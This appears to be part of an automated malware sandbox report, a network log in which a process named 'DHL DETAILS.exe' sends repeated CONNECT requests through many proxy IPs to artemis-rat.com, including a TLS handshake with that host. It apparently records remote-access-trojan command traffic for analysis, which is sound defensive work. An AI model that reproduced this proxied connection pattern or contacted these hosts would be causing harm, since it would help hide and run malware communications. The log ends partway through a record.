                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    430192.168.2.551327213.136.78.200285136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.739238024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.442476034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.458122015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536870956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630681992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    431192.168.2.5513198.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.743360043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    432192.168.2.551377157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.743602037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    433192.168.2.55021937.187.73.7161136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.749696016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.833235979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.833933115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833228111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.834141016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    434192.168.2.551409104.21.124.121806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.752588987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.906922102 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    435192.168.2.551309113.208.119.14290026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.756263971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.125158072 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    436192.168.2.5513388.213.128.6500016352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.765110970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.322695017 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:18.326332092 CET44INHTTP/1.1 200 OK
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    437192.168.2.55136998.162.25.29316796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.769788027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    438192.168.2.551350190.103.177.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.903204918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.313822985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    439192.168.2.55132265.1.244.232806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.903652906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.286886930 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:14.287240028 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ec 52 94 57 9d 91 e8 6a 84 1a d1 b3 e0 dc 73 3f 26 73 9b 62 b7 d5 ca e9 99 e0 3a 38 34 d8 e8 20 85 d3 f7 c3 9e 04 a8 97 50 86 52 97 88 8c 9a b3 c2 eb 90 03 7f c2 dd 2a db 75 44 f6 60 79 0a 46 00 2a c0 2c c0 2b
                                                                                    Data Ascii: eRWjs?&sb:84 PR*uD`yF*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:14.670571089 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 12 50 9e f9 87 ff 1d 6f 2d ea ce ff a7 15 4a ac 25 2d c6 e0 73 9a 2e 78 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9Po-J%-s.xDOWNGRD0000*H010Uartemis-rat.com0240309113427Z260309113427Z010Uartemis-rat.com0"0*H0j/]HB
                                                                                    Mar 9, 2024 13:14:14.672884941 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 61 20 84 a9 8a 1e 95 0d 0c 59 fc 15 d1 c8 33 75 69 48 56 60 9b 8b 2c de c2 96 1f 4e e7 58 19 32 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 c1 03 72 c9 e6 da 8a 26 4d 95 dc 06 23 35 23 69 1e 15 e0 c2 39
                                                                                    Data Ascii: %! a Y3uiHV`,NX2(r&M#5#i9b"
                                                                                    Mar 9, 2024 13:14:15.054948092 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 a9 3b 22 ce b5 b5 15 0c 72 4f 3b 72 b6 0c ac 61 fe 37 6e 0a cf a9 33 e4 8d 68 3a e9 f7 7a e8 77 a7 f5 ea 72 4e fb 26 a5
                                                                                    Data Ascii: (;"rO;ra7n3h:zwrN&


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    440192.168.2.55133649.4.48.12888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.903759003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    441192.168.2.55137643.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.903831005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    442192.168.2.55135347.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.904417992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    443192.168.2.55135245.138.87.23810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.904680014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    444192.168.2.551423142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.905494928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    445192.168.2.551359185.49.30.580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.906569004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    446192.168.2.550278178.33.163.156423806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.907017946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036334038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.039345026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.130038023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146460056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    447192.168.2.551433104.27.15.161806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.907211065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.061325073 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    448192.168.2.55136843.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.908242941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    449192.168.2.551403184.178.172.1441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.908664942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    450192.168.2.551412174.64.199.8241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.910075903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    451192.168.2.55035072.195.114.16941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.910170078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    452192.168.2.55032951.158.64.130163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.910463095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036403894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.039338112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    453192.168.2.55042450.62.134.139626076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.912780046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    454192.168.2.55034389.46.249.14888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.913059950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.781507969 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    455192.168.2.55024991.134.140.160489626352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.913290977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.411246061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.926932096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.951030970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
